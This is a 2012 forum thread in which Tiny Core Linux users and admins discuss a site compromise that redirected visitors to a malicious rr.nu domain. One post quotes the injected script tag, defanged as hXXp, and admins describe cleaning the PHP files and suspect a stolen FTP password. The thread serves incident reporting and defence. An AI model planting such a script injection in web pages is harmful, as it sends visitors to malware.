WelcomeWelcome | FAQFAQ | DownloadsDownloads | WikiWiki

Author Topic: Tinycore site possibly compromized?  (Read 3685 times)

Offline u54749

  • Jr. Member
  • **
  • Posts: 70
Tinycore site possibly compromized?
« on: March 04, 2012, 03:07:46 PM »
I got a couple of random redirects from the Tinycore site to hXXp://rmore79riveru.rr.nu today.

see also
http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html
http://www.haruhisuzumiya.net/haruhiforum//viewtopic.php?t=2108

as extra proof:
Download attachment "udev.log" from http://forum.tinycorelinux.net/index.php/topic,11396.msg60347.html#msg60347

it has a very suspect last line that absolutely does not belong in a log file.  I suppose this line was not present in the originally uploaded file.
the line is:
"<script src="hXXp://rmore79riveru.rr.nu/nl.php?p=d"></script>"

Can somebody reconstruct/confirm this?

Offline gutmensch

  • Retired Admins
  • Hero Member
  • *****
  • Posts: 605
  • I can make it disappear, have no fear!
    • remembrance blog
Re: Tinycore site possibly compromized?
« Reply #1 on: March 05, 2012, 10:33:58 AM »
Many thanks for the pointer, this rr.nu redirection was indeed in many of the forum php files, which should be clean now... attachments seem to be clean as well, at least I didn't find any reference to rr.nu in them any more, so it must have been delivered while accessing and downloading them.
If I seem unduly clear to you, you must have misunderstood what I said. (Alan Greenspan)

Offline bmarkus

  • Administrator
  • Hero Member
  • *****
  • Posts: 7183
    • My Community Forum
Re: Tinycore site possibly compromized?
« Reply #2 on: March 05, 2012, 10:58:44 AM »
Many thanks for the pointer, this rr.nu redirection was indeed in many of the forum php files, which should be clean now... attachments seem to be clean as well, at least I didn't find any reference to rr.nu in them any more, so it must have been delivered while accessing and downloading them.

Do you know how these files got infected?
Béla
Ham Radio callsign: HA5DI

"Amateur Radio: The First Technology-Based Social Network."

Offline gutmensch

  • Retired Admins
  • Hero Member
  • *****
  • Posts: 605
  • I can make it disappear, have no fear!
    • remembrance blog
Re: Tinycore site possibly compromized?
« Reply #3 on: March 05, 2012, 11:05:51 AM »
Do you know how these files got infected?
Nope. But it seems to have hit also wordpress and other php based installations... so I would guess it's got something to do with an admin account and maybe a hacked browser/OS, which triggers some "nice" update functions within SMF itself to spread the malware.
If I seem unduly clear to you, you must have misunderstood what I said. (Alan Greenspan)

Offline bmarkus

  • Administrator
  • Hero Member
  • *****
  • Posts: 7183
    • My Community Forum
Re: Tinycore site possibly compromized?
« Reply #4 on: March 05, 2012, 11:42:56 AM »
Do you know how these files got infected?
Nope. But it seems to have hit also wordpress and other php based installations... so I would guess it's got something to do with an admin account and maybe a hacked browser/OS, which triggers some "nice" update functions within SMF itself to spread the malware.

I had frequent infection a year ago with my SMF and other sites. In fact everything was infected and according to modification time simply in ABC order. Code attached to HTML was working (I mean as virus creator wanted), PHP got only demaged. It was easy to clean with a simply Python program but it was reinfected soon.

In my case ftp admin password was stolen and simly it logged in from outside with ftp. I can't prove, but most likely a worm have stolen my admin password from Total Commander. Since I changed admin password and do not store it in FTP clients, my sites are clean and never got infected.
Béla
Ham Radio callsign: HA5DI

"Amateur Radio: The First Technology-Based Social Network."